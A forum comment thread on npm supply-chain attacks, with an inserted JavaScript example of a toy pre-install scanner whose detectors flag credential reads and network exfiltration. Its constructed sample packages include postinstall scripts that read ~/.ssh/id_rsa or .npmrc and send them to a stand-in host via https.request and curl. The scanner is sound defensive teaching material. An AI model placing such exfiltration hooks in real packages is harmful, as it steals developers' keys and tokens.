top | item 47134602

john01dav | 5 days ago

Once this or something like it becomes widespread, won't sophisticated attackers simply test their attacks against this? So, for example, if it checks for `rm` invocations, just implement the functionality of `rm` in the malware, or if it checks for exfiltration of data, then shell out to curl to do that in a different process.

If you think of making it so robust that this is impossible, you're just describing a container, which we already have.


ComCat | 5 days ago

You're describing two different things.

The container comparison misses where these attacks actually happen. Containers limit what code can do at runtime. We flag what code intends to do before it ever runs. These are complementary. A container won't stop a postinstall script from reading ~/.ssh/id_rsa and posting it to an attacker's server if your CI environment has network access and a mounted home directory — which most do.

Yes, sophisticated attackers adapt. But the current state of npm supply chain attacks is that most don't even try to evade — because nobody's looking at the code. Every major attack in 2025 used the same playbook: credential theft + network exfil + install script abuse. Raising the floor from "zero analysis" to "26 behavioral detectors with cross-signal correlation" eliminates the entire class of low effort attacks and forces the rest into increasingly constrained patterns.
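An added example, not code from the thread or from any product discussed in it, of what "flag what code intends to do before it runs" looks like as a minimal pre-install scanner: it reads only the scripts npm would execute at install time, runs a few regex detectors over them, and correlates the hits into a verdict. The detector names, patterns, verdict thresholds and the sample packages are all constructed for illustration (a real scanner works on an AST and many more signals). The second sample shells out to `curl` from a child process, the evasion raised above; the intent is still visible in the script source, so it is still flagged. Moving the same logic into a compiled binary shipped in the tarball would not be caught by this scanner, which is the honest limit of source-level analysis.

```javascript
// Toy install-time behavioural scanner for an npm package (added example,
// not from any real tool). All signal ids, regexes and scoring are assumptions.

// Each detector is a regex over install-time source. Hits are later correlated.
const DETECTORS = [
  { id: 'cred-read',   re: /\.ssh\/|id_rsa|\.npmrc|\.aws\/credentials|AWS_SECRET_ACCESS_KEY|GITHUB_TOKEN|NPM_TOKEN/ },
  { id: 'env-dump',    re: /process\.env\b(?!\.)/ },                        // whole environment grabbed
  { id: 'net-send',    re: /\bhttps?\.request\(|\bfetch\(|new\s+XMLHttpRequest|\bnet\.connect\(|\bdns\.resolve/ },
  { id: 'shell-exec',  re: /require\(['"]child_process['"]\)|\bexecSync\(|\bspawn\(|\bexec\(/ },
  { id: 'shell-curl',  re: /\b(curl|wget)\b[^\n]*https?:\/\// },             // exfil via another process
  { id: 'obfuscation', re: /\beval\(|\bFunction\(|\\x[0-9a-f]{2}\\x[0-9a-f]{2}|Buffer\.from\([^)]*['"]base64['"]\)/ },
];

// Lifecycle scripts npm runs without the consumer asking for them.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'preuninstall', 'postuninstall', 'prepare'];

// `files` maps a path inside the package tarball to its text content.
function parseHooks(files) {
  const scripts = (JSON.parse(files['package.json'] || '{}').scripts) || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === 'string').map((h) => ({ hook: h, cmd: scripts[h] }));
}

// The hook command runs in a shell, so it is scanned itself; if it invokes
// `node <file>` and that file ships in the tarball, the file is scanned too.
function installTimeSources(files, hooks) {
  const sources = [];
  for (const { hook, cmd } of hooks) {
    sources.push({ where: `package.json:scripts.${hook}`, text: cmd });
    const m = cmd.match(/\bnode\s+(?:--[\w-]+\s+)*([\w./-]+\.(?:cjs|mjs|js))\b/);
    if (m) {
      const file = m[1].replace(/^\.\//, '');
      if (files[file] !== undefined) sources.push({ where: file, text: files[file] });
    }
  }
  return sources;
}

function detect(sources) {
  const hits = [];
  for (const { where, text } of sources)
    for (const d of DETECTORS) if (d.re.test(text)) hits.push({ signal: d.id, where });
  return hits;
}

// Cross-signal correlation: the same signal means something different when it
// sits in an install hook next to a credential read than on its own.
function correlate(hooks, hits) {
  if (hooks.length === 0) return 'none';          // nothing runs at install time
  const have = new Set(hits.map((h) => h.signal));
  const exfil = have.has('net-send') || have.has('shell-curl');
  if ((have.has('cred-read') || have.has('env-dump')) && exfil) return 'critical';
  if (exfil || have.has('obfuscation')) return 'high';
  if (have.has('shell-exec') || have.has('cred-read')) return 'medium';
  return 'low';                                    // install hook present: review it
}

function scanPackage(files) {
  const hooks = parseHooks(files);
  const hits = detect(installTimeSources(files, hooks));
  const signals = [...new Set(hits.map((h) => h.signal))].sort();
  return { hooks: hooks.map((h) => h.hook), signals, hits, verdict: correlate(hooks, hits) };
}

// Constructed sample packages (not real packages on the registry).
const MALICIOUS_DIRECT = {
  'package.json': JSON.stringify({ name: 'colorz-utils', version: '1.0.3', scripts: { postinstall: 'node setup.js' } }),
  'setup.js': [
    "const fs = require('fs'), os = require('os'), https = require('https');",
    "const key = fs.readFileSync(os.homedir() + '/.ssh/id_rsa', 'utf8');",
    "const req = https.request({ host: 'collector.example', method: 'POST', path: '/k' });",
    'req.end(key);',
  ].join('\n'),
};
const MALICIOUS_CURL = {   // same goal, exfil delegated to curl in a child process
  'package.json': JSON.stringify({ name: 'colorz-utils', version: '1.0.4', scripts: { postinstall: 'node setup.js' } }),
  'setup.js': [
    "const { execSync } = require('child_process');",
    "execSync('curl -s -X POST https://collector.example/k --data-binary @' + process.env.HOME + '/.npmrc');",
  ].join('\n'),
};
const BENIGN_NATIVE = {    // legitimate native build step; only `test` touches the network
  'package.json': JSON.stringify({ name: 'fast-hash', version: '2.1.0', scripts: { install: 'node-gyp rebuild', test: 'node test.js' } }),
  'test.js': "const https = require('https'); https.request({ host: 'registry.npmjs.org' }).end();",
};
const NO_HOOKS = {
  'package.json': JSON.stringify({ name: 'left-pad-ish', version: '0.1.0', scripts: { test: 'jest' } }),
  'index.js': 'module.exports = (s, n) => s.padStart(n);',
};

for (const [name, pkg] of Object.entries({ MALICIOUS_DIRECT, MALICIOUS_CURL, BENIGN_NATIVE, NO_HOOKS })) {
  const r = scanPackage(pkg);
  console.log(`${name}: verdict=${r.verdict} hooks=[${r.hooks}] signals=[${r.signals}]`);
}
```

The verdict depends on where a signal appears, not just that it appears: `BENIGN_NATIVE` makes an HTTPS request in its test script and is not flagged for it, because that file never runs at install time, while a bare `install` hook still earns a "review this" rating.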

groundzeros2015 | 5 days ago

This. The real problems are arbitrary pre-install scripts and a culture of not knowing what's in the dependency tree.

cyanydeez | 5 days ago

No, sophisticated attackers will make their own toolchain to catch all the other attackers, _Except themselves_.